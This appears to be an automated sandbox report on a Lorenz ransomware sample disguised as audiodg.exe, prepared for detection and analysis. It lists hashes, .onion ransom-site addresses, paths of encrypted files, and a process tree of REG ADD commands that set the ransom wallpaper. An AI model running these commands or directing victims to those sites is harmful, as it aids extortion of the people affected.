Analysis
-
max time kernel
453s -
max time network
428s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12/03/2023, 23:15
Static task
static1
Behavioral task
behavioral1
Sample
audiodg.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
audiodg.exe
Resource
win10v2004-20230220-en
General
-
Target
audiodg.exe
-
Size
1.1MB
-
MD5
7b760f60fff500d3c7c408a8bc158e0e
-
SHA1
a4b41efc63460f980130b67eb33c0bd061206744
-
SHA256
a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f
-
SHA512
13662b1447806779d82a29fbb931ec8d400adacd9074c4bbce8db8afd34bbf0c87e43b7790c1631b8d4edc870dbf5348773beadea59a3f73438cdb072c24ae75
-
SSDEEP
24576:uTRIYouZxVPjy+Q7WX6nHvjAbDbuqxXePt:tYouZL7y+QqX6nPjRq4t
Malware Config
Extracted
C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html
Extracted
C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html
http://lorenzezzket6afhfqfjagefsrjn44edsgi26kq4sfhqjal6wyneh4yd.onion/
http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion
Signatures
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\AddClear.tiff.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\AddInvoke.raw.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\EnableDisable.png.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\ExpandPing.tif.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\RestartMove.tiff.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\WriteRegister.raw.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\AddJoin.png.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\CheckpointClose.raw.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\OptimizeStop.raw.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\UnlockRestore.png.Lorenz.sz40 audiodg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation audiodg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: audiodg.exe File opened (read-only) \??\S: audiodg.exe File opened (read-only) \??\W: audiodg.exe File opened (read-only) \??\A: audiodg.exe File opened (read-only) \??\E: audiodg.exe File opened (read-only) \??\F: audiodg.exe File opened (read-only) \??\K: audiodg.exe File opened (read-only) \??\G: audiodg.exe File opened (read-only) \??\J: audiodg.exe File opened (read-only) \??\M: audiodg.exe File opened (read-only) \??\N: audiodg.exe File opened (read-only) \??\U: audiodg.exe File opened (read-only) \??\X: audiodg.exe File opened (read-only) \??\Z: audiodg.exe File opened (read-only) \??\H: audiodg.exe File opened (read-only) \??\I: audiodg.exe File opened (read-only) \??\O: audiodg.exe File opened (read-only) \??\P: audiodg.exe File opened (read-only) \??\V: audiodg.exe File opened (read-only) \??\Y: audiodg.exe File opened (read-only) \??\B: audiodg.exe File opened (read-only) \??\L: audiodg.exe File opened (read-only) \??\Q: audiodg.exe File opened (read-only) \??\T: audiodg.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h2x.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.boot.tree.dat.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ul-oob.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\TURABIAN.XSL.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\MSFT_PackageManagement.psm1.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\CHANGELOG.md.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_CN.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\7-Zip\Lang\es.txt.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre1.8.0_66\Welcome.html.Lorenz.sz40 audiodg.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-down_32.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Toast.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-80.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Violet.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] audiodg.exe File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\BreakAndContinue.Tests.ps1.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.Lorenz.sz40 audiodg.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\y7K0rN8INAtf.bmp audiodg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp" reg.exe Key created \REGISTRY\USER\S-1-5-20\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp" reg.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 5684 WINWORD.EXE 5684 WINWORD.EXE 5832 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe 2496 audiodg.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeSecurityPrivilege 2084 WMIC.exe Token: SeTakeOwnershipPrivilege 2084 WMIC.exe Token: SeLoadDriverPrivilege 2084 WMIC.exe Token: SeSystemProfilePrivilege 2084 WMIC.exe Token: SeSystemtimePrivilege 2084 WMIC.exe Token: SeProfSingleProcessPrivilege 2084 WMIC.exe Token: SeIncBasePriorityPrivilege 2084 WMIC.exe Token: SeCreatePagefilePrivilege 2084 WMIC.exe Token: SeBackupPrivilege 2084 WMIC.exe Token: SeRestorePrivilege 2084 WMIC.exe Token: SeShutdownPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2084 WMIC.exe Token: SeSystemEnvironmentPrivilege 2084 WMIC.exe Token: SeRemoteShutdownPrivilege 2084 WMIC.exe Token: SeUndockPrivilege 2084 WMIC.exe Token: SeManageVolumePrivilege 2084 WMIC.exe Token: 33 2084 WMIC.exe Token: 34 2084 WMIC.exe Token: 35 2084 WMIC.exe Token: 36 2084 WMIC.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeSecurityPrivilege 2084 WMIC.exe Token: SeTakeOwnershipPrivilege 2084 WMIC.exe Token: SeLoadDriverPrivilege 2084 WMIC.exe Token: SeSystemProfilePrivilege 2084 WMIC.exe Token: SeSystemtimePrivilege 2084 WMIC.exe Token: SeProfSingleProcessPrivilege 2084 WMIC.exe Token: SeIncBasePriorityPrivilege 2084 WMIC.exe Token: SeCreatePagefilePrivilege 2084 WMIC.exe Token: SeBackupPrivilege 2084 WMIC.exe Token: SeRestorePrivilege 2084 WMIC.exe Token: SeShutdownPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2084 WMIC.exe Token: SeSystemEnvironmentPrivilege 2084 WMIC.exe Token: SeRemoteShutdownPrivilege 2084 WMIC.exe Token: SeUndockPrivilege 2084 WMIC.exe Token: SeManageVolumePrivilege 2084 WMIC.exe Token: 33 2084 WMIC.exe Token: 34 2084 WMIC.exe Token: 35 2084 WMIC.exe Token: 36 2084 WMIC.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 5832 WINWORD.EXE 5832 WINWORD.EXE 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe 3428 msedge.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
pid Process 5684 WINWORD.EXE 5832 WINWORD.EXE 5684 WINWORD.EXE 5832 WINWORD.EXE 5684 WINWORD.EXE 5832 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5832 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5832 WINWORD.EXE 5832 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE 5684 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2496 wrote to memory of 1660 2496 audiodg.exe 87 PID 2496 wrote to memory of 1660 2496 audiodg.exe 87 PID 2496 wrote to memory of 1660 2496 audiodg.exe 87 PID 1660 wrote to memory of 3596 1660 cmd.exe 88 PID 1660 wrote to memory of 3596 1660 cmd.exe 88 PID 1660 wrote to memory of 3596 1660 cmd.exe 88 PID 2496 wrote to memory of 4816 2496 audiodg.exe 89 PID 2496 wrote to memory of 4816 2496 audiodg.exe 89 PID 2496 wrote to memory of 4816 2496 audiodg.exe 89 PID 4816 wrote to memory of 3536 4816 cmd.exe 90 PID 4816 wrote to memory of 3536 4816 cmd.exe 90 PID 4816 wrote to memory of 3536 4816 cmd.exe 90 PID 2496 wrote to memory of 2704 2496 audiodg.exe 91 PID 2496 wrote to memory of 2704 2496 audiodg.exe 91 PID 2496 wrote to memory of 2704 2496 audiodg.exe 91 PID 2704 wrote to memory of 2484 2704 cmd.exe 92 PID 2704 wrote to memory of 2484 2704 cmd.exe 92 PID 2704 wrote to memory of 2484 2704 cmd.exe 92 PID 2496 wrote to memory of 2628 2496 audiodg.exe 93 PID 2496 wrote to memory of 2628 2496 audiodg.exe 93 PID 2496 wrote to memory of 2628 2496 audiodg.exe 93 PID 2628 wrote to memory of 2464 2628 cmd.exe 94 PID 2628 wrote to memory of 2464 2628 cmd.exe 94 PID 2628 wrote to memory of 2464 2628 cmd.exe 94 PID 2496 wrote to memory of 4200 2496 audiodg.exe 95 PID 2496 wrote to memory of 4200 2496 audiodg.exe 95 PID 2496 wrote to memory of 4200 2496 audiodg.exe 95 PID 4200 wrote to memory of 244 4200 cmd.exe 96 PID 4200 wrote to memory of 244 4200 cmd.exe 96 PID 4200 wrote to memory of 244 4200 cmd.exe 96 PID 2496 wrote to memory of 216 2496 audiodg.exe 97 PID 2496 wrote to memory of 216 2496 audiodg.exe 97 PID 2496 wrote to memory of 216 2496 audiodg.exe 97 PID 216 wrote to memory of 208 216 cmd.exe 98 PID 216 wrote to memory of 208 216 cmd.exe 98 PID 216 wrote to memory of 208 216 cmd.exe 98 PID 2496 wrote to memory of 4996 2496 audiodg.exe 99 PID 2496 wrote to memory of 4996 2496 audiodg.exe 99 PID 2496 wrote to memory of 4996 2496 audiodg.exe 99 PID 4996 wrote to memory of 2084 4996 cmd.exe 101 PID 4996 wrote to memory of 2084 4996 cmd.exe 101 PID 4996 wrote to memory of 2084 4996 cmd.exe 101 PID 3428 wrote to memory of 7880 3428 msedge.exe 129 PID 3428 wrote to memory of 7880 3428 msedge.exe 129 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130 PID 3428 wrote to memory of 7904 3428 msedge.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\audiodg.exe"C:\Users\Admin\AppData\Local\Temp\audiodg.exe"1⤵
- Modifies extensions of user files
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"3⤵
- Modifies data under HKEY_USERS
PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"3⤵
- Modifies data under HKEY_USERS
PID:3536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"3⤵
- Modifies data under HKEY_USERS
PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"3⤵
- Sets desktop wallpaper using registry
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"3⤵
- Modifies registry class
PID:244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:216 -
